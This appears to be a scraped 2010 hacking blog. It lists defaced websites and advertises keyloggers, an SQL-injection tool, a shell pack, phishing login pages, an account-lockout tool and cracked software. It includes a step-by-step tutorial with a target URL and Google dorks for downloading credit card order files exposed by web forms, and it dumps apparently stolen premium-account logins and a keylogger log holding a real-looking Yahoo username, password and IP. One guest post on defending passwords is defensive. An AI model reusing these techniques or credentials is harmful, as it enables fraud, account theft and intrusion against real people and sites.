Pages

Tuesday, September 21, 2010

12 WebSites HaCkEd By _Banti_

http://ahlanthailand.com
.
.
http://timewatches4u.com/
.
.
                                                               http://sukhothaiorganics.com/


Friday, September 17, 2010

Digital Keylogger v3.0

DuDe Click on the image to see full Size Greetings ALBoRaaQ-TeAm

- Get keylog Automat: You set how fast to recive the keylog from server.
- Get keylog Manual: Click "Get Keylog" to get the keylog from server.
- Close Y! : You will close victim's Yahoo! Messenger, the victim will login, and you will get his password. Server will disable "Remember ID & Password" and "Auto-Login" options if they are activated.
- Kill Server: The server will be deleted from victim's pc.
- Send Message: You can send a message to your victim. Message type will be critical, the title will be "Microsoft Windows".
- Use Backspace: If you select Yes, if your victim press Backspace button, it will keylog your to have an effect. It will delete a char from keylog. If you select No, Backsapce Pressing button, will not has any effect.
- Save Log: You can save the keylog to your PC.
- System Tray: The client will move to the System Tray, behind the clock. Just move the mouse over his icon to restore it.


download

Havij v1.12 Advanced SQL Injection

DuDe Click on the image to see full Size Greetings ALBoRaaQ-TeAm

U-file Credit Card Database Hacking

I have only just found this elsewhere so have not yet tried it but thought i would share for all here at alboraaq.

This is a basic tutorial for hacking u-file database order forms
it will teach you how to get u-file cc database so lets start

open this link

Code:
http://www.miamionlineflowers.com/orderformterra_anniversary_eng.htm
as you can see its an order form page.

1st step : (all you need to do is to view the source) go to view tab
then click the page source or view source.after you have viewed the source the

2nd step : (prest ctrl f then find u-file=) after you have found the “u-file=”
you will see this code all you need to get from the u-file is the “_private/form_results.txt”

3rd step :after getting the u-file this will be the last step just put the
u-file code besides the website like this.

Code:
http://www.miamionlineflowers.com/_private/form_results.txt
how to search in google : flowers orderform .htm | u-file=
so it will base on the string you use in searching for u-file database

here you go enjoy.

huge rs premium account

Login:12407114
Password:TnwGhQ


Login:Skilles
Password:4862486213793

Login:11337847
Password:Windwaker1

Login:13570944
Password:76dxb2je57


Login:17382709
Password:sQKp9uDL
4 126 MB

------------------------------------------------------
Login:ciuens
Password:ximbas
3000 MB



Login:xtr33m.wap
Password:20061988
3 002 MB



Login:10161310
Password:mdLZqLQ8
2 335 MB
------------------------------------------------------
Login:63935
Password:emfbuq
1000 MB


username:- JuNGLiST.97
Password:- 69696969
1000 MB

Login:JuNGLiST.97
Password:69696969
1000 MB
------------------------------------------------------

Login:14910406
Password:RUTMD3XG
1000 MB

Downlad Free Facebook Suspender (by Email Only)

Features:
Let's you freeze Facebook, Windows Live, and YouTube accounts. Coming soon are MySpace and AIM too, the code is there it's just that the page loading is funky.


How it Works:
Many sites have a feature that after xx amount of invalid logins (usually around 20-25, but this program does 30 just for good measure), the account is either disabled for an allotted amount of time (an hour or so, depending on the site), or the account is disabled until reset through the user's email. This program basically spams the login with the username you enter, and the password "1234567890", until the account is disabled.


Usage:
Select a website from the drop down list (right now there is only Facebook, Windows Live, and YouTube), enter the email/username of the victim, then hit Freeze. You'll hear a bunch of clicking, which is the web control submitting the login form. The 'Let me watch' check mark expands the program to let you see it in action.
Note: It uses an internet explorer web control
YouTube - Facebook Suspender V1.0 HACK!!!
Screenshots:











File Name: Facebook_Suspender_V1.0.rar File Size:7873 KB Status:CLEAN AntivirusSig versionEngine VersionResult a-squared12/07/20094.5.0.1-Avira AntiVir7.1.4.2207.6.0.59-Avast090711-04.8.1229-AVG270.13.12/22348.0.0.0-BitDefender13/07/20097.0.0.2555-ClamAV12/07/20090.95.1-Comodo16213.10.529-Dr.Web13/07/20095.0-Ewido13/07/20094.0.0.2-F-PROT6200907134.4.4.56-G-Data19.60842.0.7309.847-Ikarus T312/07/20091001044-Kaspersky13/07/20098.0.0.357-McAfee11/07/20095.1.0.0-Malware Hash Registry13/07/2009N/A-NOD32 v342403.0.677-Norman2009/07/105.92.08-Panda21/05/20099.5.1.00-QuickHeal13 July, 200910.0-Solo Antivirus13/07/20098.0-Sophos13/07/20094.32.0-TrendMicro265(626500)1.1-1001-VBA3213/07/20093.12.0.300-Virus Buster
10.108.41.4.3-
.................................................................... .................................................................................................................................................
........................................................................................................................................................................................................................
........................................................................................................................................................................................................................

Download Free Bandwitdth Controller - Network Management Software (Cracked)


Bandwidth Controller Enterprise is a scalable traffic shaping solution for corporate networks and service providers. It provides Layer 3 transaction processing for high performance, low latency bandwidth management across the entire organization.

The product can be installed on any internet gateway or server computer giving network administrators access to all internet streams for both upload and download directions. By using this architecture, bandwidth rules and product configuration are guarded against modification from end-users, with the additional benefit of transparent operation (i.e. client-side installation is not required).

Kernel level processing provides extra performance for high speed networks, with support for line speeds up to 8,000 Mbps. Real-time traffic such as VoIP and video is handled by the kernel processor using a combination of prioritization (QoS) and guaranteed service levels (SLAs), resulting in high quality network streams.

Guaranteed Bandwidth Levels
Service Level Agreements are implemented using rules that specify a minimum allocation for applications and protocols. These guaranteed bandwidth levels provide a consistent stream for applications such as VoIP that require a minimum level of bandwidth to function correctly.

Percentage Allocation
Bandwidth can be assigned on a percentage or ratio basis, giving specified users and protocols a greater allocation depending on their needs and characteristics. With this feature it is not necessary to set hard limits as the internet bandwidth is divided based on the available bandwidth at the time.

Dynamic Batch Rules
The dynamic rule feature makes it possible to process an entire group of users with just a single entry. This saves manually creating separate rules for each user, saving time and reducing complexity for administrators. It also provides automated bandwidth distribution policies for user groups, giving each user equal bandwidth only while they are actively using the internet resource.

Visit: http://bandwidthcontroller.com/enterprise.html
          Download Crack Here Free

.............................................................................................................................................................................................................
.............................................................................................................................................................................................................
.............................................................................................................................................................................................................
.............................................................................................................................................................................................................

Fud Keylogger!! ALBERTINOKEY FUD Tutorial Included

Fud Keylogger!! ALBERTINOKEY FUD



Amarjit Singh Website (www.freehacking.net)Hacked by Hakka Noodles from Kabul Afghanistan

Amarjit Singh Website (www.freehacking.net)Hacked by Hakka Noodles from Kabul Afghanistan

Tuesday, September 14, 2010

Geo Investigation Cyber Terrorism in pakistan

Geo Investigation Cyber Terrorism
Part 1


Monday, September 13, 2010

Packet-O-Matic – An Open Source Realtime Packet Processor

Packet-o-matic is a modular real time packet processor under the GPL license. It reads the packet from an input module, match the packet using rules and connection tracking information and then send it to a target module. The modular nature of packet-o-matic allows it to work for any protocol as long as its corresponding module is found. The built in management console allows you to telnet in packet-o-matic and change the configuration in real time. Main features of Packet-o-matic are :

Magic PS v1.5 SE [FINAL] - Hack Password Yahoo Messenger 10 [WORKING 100%]

Description


Magic PS v1.5 SE++ [FINAL] - Hack Password Yahoo Messenger 10 [WORKING 100%]

Infecting Your through IP


Sunday, September 12, 2010

Learn How to hack websites Using DNN [Dot Net Nuke] Exploit

Hack Website Using DNN [Dot Net Nuke] Exploit

138 Shells Free Download

Those Are 138 Shells
Only 1.47 MB

CHange XP start Button Text

Step 1 - Modify Explorer.exe File

In order to make the changes, the file explorer.exe located at C:\Windows needs to be edited. Since explorer.exe is a binary file it requires a special editor. For purposes of this article I have used Resource Hacker. Resource HackerTM is a freeware utility to view, modify, rename, add, delete and extract resources in 32bit Windows executables and resource files (*.res). It incorporates an internal resource script compiler and decompiler and works on Microsoft Windows 95/98/ME, Windows NT, Windows 2000 and Windows XP operating systems.

Admin Page Finder Perl Script

#!/usr/bin/perl

################################################## ###################
# Modified by Code5_
# Admin Control Panel Finder 
# enjoy... =D ################################################## ####################

Hacking Shop Admins - Old Trick but useful

1) go to google.com
2) in google type cart.php?m=view
3) Go to pages 24-54
4) Right click and open in a new window
5) Your link should be something similar to

New Def By _Banti_#1

http://www.toonjet.com/images/avatars/PaKos.htm

Messeges Type

Logs....

Program:   Firefox
Url/Host:   https://login.yahoo.com
Login:      goldgen4you
Password:   pokedude2
Computer:   YOUR-4DACD0EA75
Date:      2010-07-30 02:25:51
Ip:         74.109.134.58
----------------------------------------------------------

Saturday, September 11, 2010

Best Hacking Videos: Hacking Videos Free Download



52 Video Tutorial Networking Hacking

Hack yahoo using fake login page

Subscribe to PakcyberArmy
Fake login page

ObiWaN – Server Bruteforcer by Phenoelit

ObiWaN is the brainchild of Phenoelit, a german hacker group headed by elite hacker FX which is written to carry out brute force security testing on Webservers. The goal of ObiWaN is a brute force authentication attack against Webserver with authentication requests - and in fact to break in insecure accounts. As the official documentation says -

5 more sites for Security Basics

last time I blogged about 5 sites for Budding Hackers & followed up with  5 more sites for budding hackers... but as the user queries flood my inbox for more, I decided to dig a bit more & publish some of the more prominent sites I visit in my free time. The following blogs are prominient & hot favorites for security essentials & are full of resources which will enhance your skill set. A must visit list -

Thursday, September 9, 2010

Cyber Terror Book Launched on 30th October

Cyber Terror Book Launched on 30th October: GOOD NEWS ALL MY FRIENDS 

Thanks To one and all - By Vaidehi Sachin

Hackers create 57,000 fake web addresses weekly


According to a three month long study carried out by PandaLabs – the research arm of Panda Security – each week, hackers are creating 57 000 new fake web addresses to trick or infect users.

Hackers Exploit Twitter XSS Flaw


Password recovery & hostname changes in linux

So..it recently happened to me when I while messing with my system, i wrote a script to change root password & set it to expire in every 7 days & simultaneously making changes to hostname by setting it to a random value.. I queried my friend Raghu for inputs regarding it & got some interesting results,which I will be compiling here. This tutorial is intended for Linux newbies & would help them to get familiar with the enviornment. Actually, after 7 days what happened I tried to log in,& it always said "root password expired, please contact your administrator"..seems familiar ? well..here is how you can eradicate this.

Wednesday, September 8, 2010

Buffer Overflow Attack tutorial by example

A Buffer Overflow is a flaw by which a program reacts abnormally when the memory buffers are overloaded, hence writing over adjacent memory. It can be triggered by using inputs that may alter the way a program operates,for example <inputting a very large value in a c program which does integer based addition>. A buffer overflow can lead to program crash, memory access error, garbage outputs & worse, breach of system security. Probably, you might have seen prominent buffer overflow based exploits & attacks in Metaspl0it or any other spl0it framework. Why I am writing this ? well..I found an excellent article on buffer overflow by eXeCuTeR <executerx[at]gmail[dot]com> & thought you might wanna have a look at it. Its exlplained in quite easy language with very basic example.
read & learn..

Automatic SQL Injection Tool – SQLMAP

Sqlmap is an open source command-line automatic SQL injection tool and its goal is to detect and take advantage of SQL injection vulnerabilities in web SQL Injection applications. Once it detects one or more SQL injections on the target host, the user can choose among a variety of options to perform an extensive back-end database management system fingerprint, retrieve DBMS session user and database, enumerate users, password hashes, privileges, databases, dump entire or user’s specified DBMS tables/columns, run his own SQL statement, read or write either text or binary files on

Facebook Controller

A Big Collection Of Fake Pages

hello all

me and my frnd virus noir just made a collection of fake pages and the report on |Text+Email|

i Will start with 3 fake pages

Unzipping Password
:
V!rus No!r

|Facebook|Yahoo|Gmail





facebook

Ultra Hacker Tools

First let me tell you.This is not my software.This package contains some very useful tools.Checkout the full list of contains below.And I am sure this literally IS a Ultra Hacker Tools.

As always most hacking tools always been treated as virus or Trojan by your AV/Firewalls.So , you may/will get a virus warning when you will run it but loet me tell you this program is NOT backdoor-ed and I have not put a binder or server in this to infect you.I will never do that as this is my most favorite place on the net..So, if you can ignore the smell , this software may come handy for you.

Here is a brief details of the full package & you will see how big this package is.Because it contains so much tools you may not ever require but you can keep them in your hacking collections.



Remote Administration

How to Defend Your Account & Passwords From Hackers

How to Defend Your Account & Passwords From Hackers

GUEST POST BY AJAY DHAKA

How many times have you heard someone ask "how do I hack Orkut or Gmail?"
It’s become a type of joke among frequent visitors of hacker related chat rooms and websites. This article is being written for the sole purpose of defending yourself against such actions.


Lets start by going over a few terms I use so there is no confusion. If you think this is silly, you’d be surprised at the # of emails I get asking what is a...
I figure I’ll just spell it out.

UN = username
PW = password
SW = software
HW = hardware
DL = download
KL = keylogger
RAT = remote administration / access tool.

Dispelling a few rumours:

1. You can use a bruteforcer program to get a Orkut/Gmail or Hotmail password.

This simply is not the case. Both Orkut/Gmail and Hotmail have security in place specifically designed to stop this kind of attack. Orkut/Gmail requires that you enter a random code into an additional field provided as well as the UN and PW after 3 failed login attempts. Failure to enter the correct code will result in a failure to log into the account, even if the UN and PW are correct. Hotmail has a different security feature which sends the user to a ‘lockout’ page, which has NO fields to enter the UN or PW after just one failed attempt. These two methods are effective for eliminating bruteforcing to exploit their service.
2. There are programs that hack Yahoo and Hotmail.
Once again, that’s not entirely true. While there are programs that claim to be able to hack Orkut/Gmail and yahoo, all they really seem to be are specialized keyloggers and trojans that send the info from a targets computer. The question is then, if you can get a target to download / run a program, then why would you only steal their email account information? Why not simply take control of the whole thing? A lot of people that use these programs are not well versed enough to know how to cover their tracks and can easily be caught when using such programs. Many of these programs are also specially designed to steal information from the computer that tries to run it, thus exploiting the would-be attacker.

3. You can email an automated pw recovery service and trick it to gain the pw of the account you choose.

Ever see something that goes something like this?:
Note: the following is bullshit. Ive added this note since no one seems to read this tutorial and skim through it, then email me complaining that it doesnt work. thus...

THE FOLLOWING IS AN EXAMPLE OF A SCAM.

(1) send an E-mail to passwordrecoverybot@gmail.com
(2) In the subject box type "PASS RECOVERY SYSTEM"
(3) In the message box type in first line : "Victim's USER ID"
(4)In Next Line type your User ID.
(5)In Next Line Type Your Password.
(6)In next line type these codes " /cgi-bin/start?v703&login.USER=passmachine&class=supervisor&f=get.password&f=27586&javascript=ACTIVE&rsa
(4) Send the e-mail with priority set to "high" .
(5) Wait 2-3 minutes and check your mail


Well, there’s my example of a scam designed to steal your information...simply by tricking you into sending your password to the attackers email (passwordrecoverybot@gmail.com in this example) and the specific things to type and all that bullshit is just that... bullshit. Specificlly, bullshit made to look like it actually does something to the standard pc user and/or layperson (aka target)... but it doesnt.

This may also explain some of the people saying they were hacked. Obviously, don’t send your password to anyone for any reason, ever.

What it all comes down to is this:

If you're looking to get an email ID, you hack the targets PC, not Gmail or yahoo directly. If someone were to actually crack into the gmail or yahoo servers, they would be logged, traced, and the security flaw patched I would say within 15-50 minutes... maybe 24-48 hours the latest.
These types of companies have a multi million or even billion dollar backing, a literal army of first class techs and security teams, and apply the newest and most sophisticated SW, HW and intrusion detection/protection/management methods the industry has to offer.
Now on the other side of the story, you have an end user who probably hasn’t even installed a single update on their machine, has all the default settings enabled, doesn’t know an .exe file from a .com, uses an un-patched version of IE or AOL, doesn’t know how to enable their firewall or configure it if it is enabled, etc.

In other words, why attack a well-trained, well-equip army guarding a document when you can attack a less able individual to get it?

Note – This type of many video available on YouTube.

These are some of the more common methods for "hacking Gmail/ Yahoo PWs":


1. Fake login page
2. email phishing campaign
3. RAT
4. Keyloggers
5. cookie grabber
6. spyware
7. fake programs (rat/kl)
8. Social engineering

1. Fake login page:
This method is generally used on public terminals, and can be quite effective for gathering large numbers of Ids. The way it works is documented in another tutorial I have written, but basically its just a matter of someone making a replication of Gmail or Yahoo site, by copying and making minor modifications to their source code and setting their page as the home page. They then set the input fields to send the information to an email address or database. I personally believe the level of success using this method depends on the system, and the amount of creativity involved in making the page look as authentic as possible. To avoid falling victim to this, type the address of the page you are logging into directly into the browser, including the prefix "http://"

2. Email phishing campaign:

Phishing has unfortunately become a household word, though some people associate it with SPAM. Phishing is really just spamming and using deception and trickery to gain information to exploit a service, system, etc. Phishers have posed as banks, email services, law enforcement agents, online contests, teachers, automated services, Nigerians in need of a way to transfer millions in cash, software firms, friends, acquaintances, even the targets themselves. Anyone and anything that you can impersonate, expect a phisher to try. Their emails generally come with an attachment that contains a program like a trojan, RAT or keylogger or virus that either exploits your system searches for PWs and banking info and sends it to the phisher or simply infects or destroys your PC. Some of these scams can be EXTREMELY well done, and almost indistinguishable from a real email (provided by for example, a company they are impersonating). It’s always best to contact the company by phone or mail to confirm anything suspicious.

3. RATs:

Remote administration tools or remote access tools. These programs allow an attacker varying degrees of control over the PC that has the SW installed. The level of access depends on the RAT. Control over the PC allows installation of other malicious software that can be used to track keystrokes, web sites visited, programs accessed, and even take screenshots of the infected computer and send them to an email address covertly. It is also capable of allowing the attacker to make any changes to the system they would like. Obviously, this isn’t good.
Most antivirus and spybot removal SW will detect and remove these types of programs. It’s also a good idea to not only use, but check the logs, settings, permissions and outgoing/incoming traffic of your firewall to prevent this type of thing from happening to you.

4. Keyloggers:

Keyloggers can track keystrokes, web sites visited, programs accessed, and even take screenshots of the infected computer and send them to an email address covertly. Again, most antivirus and spybot removal SW will detect these. If you fear your pc has been comprimised, you can take steps to ensure your PW isnt logged until you can scan for and remove it. Open a word document and write out a list of the UN’s you’ll be using and the a list of the PWs. then cut and paste them accordingly into the fields if you fear a KL or other monitoring device may be in use so that while the SW will pick up the keystrokes, it will not know what PWs match the UNs. If you'd like to take that a step farther, write several random letters and numbers around your PW in the word file and cut out the extra letters until you come out with the UN or PW desired.

5. Cookie grabber:

This method depends on whether or not the target has opted to save or have the computer remember their PW. The information is saved in the cookies and can be used to exploit some mail services. The information can be gained through a website or email containing a script that ‘grabs’ the information. Deleting or not allowing the use of cookies can stop this method.

This method is most common using in many Orkut Communities named by :"FREE RECHARGE OF RS. 500" Etc..............

6. Spyware:

Spyware / adware are small programs installed and executed on a target PC for use as tracking tools generally for advertising purposes. These programs generally rely on web browser vulnerabilities to install and run on your system. However, as previously mentioned, any program that is installed on your PC without your knowledge isn’t good. Some attackers have taken this technology and created spybots particularly designed to send sensitive information about your system to a predetermined mail address or database. This can generally be avoided by updating and patching your browser as often as possible. I personally suggest using Mozilla Firefox as a browser, as it is not as vulnerable as internet explorer and operates in much the same way, and has a similar interface. There are literally THOUSANDS of anti spyware programs available, two that I find work exceptionlly, especially in conjuction with each other is Spybot Search and Destroy and Adaware SE personal. Before you get a spyware removal program, research it and see what the general concensus is as some programs touted as spyware removers actually install spyware on your system.

7. Fake programs:

I mentioned this earlier in this article in the dispelling rumors section. There are programs like booters, Gmail and yahoo hackers, point and click trojans, keyloggers, audio and video SW, etc that contain RATs and other malicious programs. The obvious way to minimize the chances of becoming a victim of this method of exploitation is not to DL ‘shady’ programs (ie. programs that do illegal things). The general rule is "If something sounds too good to be true, it probably is." When DLing programs, make sure that you have researched them, and the company/website it came from. Keep a record of this as well, and check your system often for signs of exploitation.

8. Social engineering:

This can, and often is combined with any of the above methods. Social engineering is really just exploiting people instead of SW. Social engineers use a variety of ways to trick someone into giving them the information they desire. These cons can be amazingly ingenious, professional and complex, or they can be ridiculously crude and almost laughable. Again, if you have doubts about the legitamacy of something or someone or something just seems strange don’t do it. Don’t give out sensitive information, period. You can always check up on a story or website later.

Be aware that these methods are simply the most common. These are not the only way for someone to get your PW. Unfortunatly, if someone wants something bad enough, they’re probably going to get it. At least by familiarizing yourself with these methods, you can recognize scams and potential attempts to steal your information and avoid it.

It is my hope that this article helps stop you from becoming a victim, and screws a slew of lamers and script kiddies into looking for another hobby.

Hacked By Pak Cyber ARMY

http://www.batasmartstep.com/fileadmin/pca.html  indian Website Hacked  By Pak Cyber ARMY - www.pakcyberarmy.net - [PCA] | defaced By <= Shak =>
  
 
Powered by Blogger